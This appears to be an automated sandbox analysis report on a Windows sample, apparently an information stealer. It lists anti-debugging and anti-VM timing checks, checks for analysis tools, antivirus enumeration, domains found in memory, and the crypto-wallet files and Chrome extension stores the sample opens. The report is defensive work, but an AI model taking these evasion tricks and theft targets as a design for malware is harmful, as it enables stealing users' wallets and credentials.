              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60C0C second address: 4B60C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F5E6851342Dh 0x00000010 mov ax, E527h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5E68513439h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60C45 second address: 4B60C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F1Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60130B6 second address: 60130BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60130BE second address: 60130C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6008170 second address: 6008188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E6851342Eh 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601216F second address: 6012181 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E68E41F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F5E68E41F22h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6012181 second address: 601218E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E68513426h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60122E2 second address: 6012307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F5E68E41F3Bh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5E68E41F25h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015780 second address: 60157A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5E68513435h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60157A4 second address: 60157F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D2DD8h] 0x00000011 ja 00007F5E68E41F1Ch 0x00000017 push 00000000h 0x00000019 mov ecx, dword ptr [ebp+122D2B74h] 0x0000001f push A48E2B3Dh 0x00000024 pushad 0x00000025 push eax 0x00000026 je 00007F5E68E41F16h 0x0000002c pop eax 0x0000002d pushad 0x0000002e jmp 00007F5E68E41F26h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60157F0 second address: 601584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 5B71D543h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F5E68513428h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D250Fh], esi 0x0000002d push 00000003h 0x0000002f xor dword ptr [ebp+122D36CFh], ecx 0x00000035 push 00000000h 0x00000037 jo 00007F5E6851342Bh 0x0000003d mov ecx, 62F0CF1Fh 0x00000042 push 00000003h 0x00000044 mov dword ptr [ebp+122D250Fh], eax 0x0000004a call 00007F5E68513429h 0x0000004f pushad 0x00000050 jl 00007F5E6851342Ch 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601584F second address: 6015856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015856 second address: 6015895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F5E6851343Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007F5E68513435h 0x00000019 pop esi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60159C4 second address: 60159C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60159C8 second address: 6015A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or cx, 4143h 0x0000000f push 00000000h 0x00000011 jmp 00007F5E68513433h 0x00000016 push 99BA7508h 0x0000001b jmp 00007F5E6851342Ch 0x00000020 add dword ptr [esp], 66458B78h 0x00000027 jmp 00007F5E6851342Fh 0x0000002c mov ecx, dword ptr [ebp+122D2D24h] 0x00000032 push 00000003h 0x00000034 jns 00007F5E6851342Ch 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F5E68513428h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 push 00000003h 0x00000058 jmp 00007F5E6851342Ch 0x0000005d call 00007F5E68513429h 0x00000062 pushad 0x00000063 je 00007F5E6851342Ch 0x00000069 ja 00007F5E68513426h 0x0000006f push edi 0x00000070 jnl 00007F5E68513426h 0x00000076 pop edi 0x00000077 popad 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d js 00007F5E68513426h 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015A81 second address: 6015A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015A85 second address: 6015A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015A8B second address: 6015A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015A91 second address: 6015AA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015AA7 second address: 6015AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015AB5 second address: 6015ABF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015ABF second address: 6015AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E68E41F25h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015AF3 second address: 6015AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015AF9 second address: 6015AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015AFF second address: 6015B45 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d movzx esi, si 0x00000010 lea ebx, dword ptr [ebp+1244B69Ch] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F5E68513428h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jnc 00007F5E68513428h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015B90 second address: 6015B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015B94 second address: 6015B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015B9A second address: 6015BE1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E68E41F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F5E68E41F18h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 adc si, 3E72h 0x0000002a push 00000000h 0x0000002c mov dl, al 0x0000002e push D2A08F73h 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015BE1 second address: 6015BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6015BE5 second address: 6015C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 2D5F710Dh 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F5E68E41F18h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 call 00007F5E68E41F27h 0x0000002d mov dword ptr [ebp+122D36CFh], edi 0x00000033 pop ecx 0x00000034 ja 00007F5E68E41F1Ch 0x0000003a push 00000003h 0x0000003c mov dh, B1h 0x0000003e push 00000000h 0x00000040 movsx ecx, si 0x00000043 push 00000003h 0x00000045 xor dword ptr [ebp+122D36CFh], ecx 0x0000004b push A6456CBCh 0x00000050 pushad 0x00000051 push edi 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 pop edi 0x00000055 jmp 00007F5E68E41F21h 0x0000005a popad 0x0000005b add dword ptr [esp], 19BA9344h 0x00000062 mov esi, dword ptr [ebp+122D2DC8h] 0x00000068 lea ebx, dword ptr [ebp+1244B6A7h] 0x0000006e xchg eax, ebx 0x0000006f push edi 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 popad 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033168 second address: 6033199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68513435h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F5E68513434h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033432 second address: 603343D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E68E41F16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603343D second address: 6033449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5E68513426h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033449 second address: 6033457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5E68E41F1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60335D7 second address: 60335F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513435h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033749 second address: 603374D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603374D second address: 6033775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68513438h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jp 00007F5E68513426h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033A36 second address: 6033A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E68E41F1Eh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F5E68E41F1Eh 0x00000010 pop ecx 0x00000011 push edi 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033A5F second address: 6033A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033CE4 second address: 6033CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033CE8 second address: 6033CF2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033CF2 second address: 6033D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F5E68E41F1Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007F5E68E41F16h 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d jnp 00007F5E68E41F16h 0x00000023 popad 0x00000024 pushad 0x00000025 jng 00007F5E68E41F16h 0x0000002b jmp 00007F5E68E41F20h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6033E6B second address: 6033E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F5E6851342Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5E68513432h 0x00000013 jg 00007F5E68513426h 0x00000019 jo 00007F5E68513426h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603414C second address: 6034150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034150 second address: 6034154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034154 second address: 6034164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5E68E41F22h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60342C0 second address: 60342D0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E68513426h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60343EE second address: 60343F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60343F2 second address: 60343FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034B08 second address: 6034B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034B0C second address: 6034B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034B12 second address: 6034B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F5E68E41F16h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034CA5 second address: 6034CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034DC4 second address: 6034DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6034DC8 second address: 6034DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603C261 second address: 603C26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603C26E second address: 603C284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007F5E68513426h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 22B9C9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3D464B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3E04FA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 463CDE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5E9DCAA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5E9DC37 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6956Thread sleep time: -36018s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5472Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6980Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6984Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exeString found in binary or memory: Wallets/Electrum
              Source: file.exeString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.1839802820.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: Wallets/Ethereum
              Source: file.exe, 00000000.00000003.1839802820.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
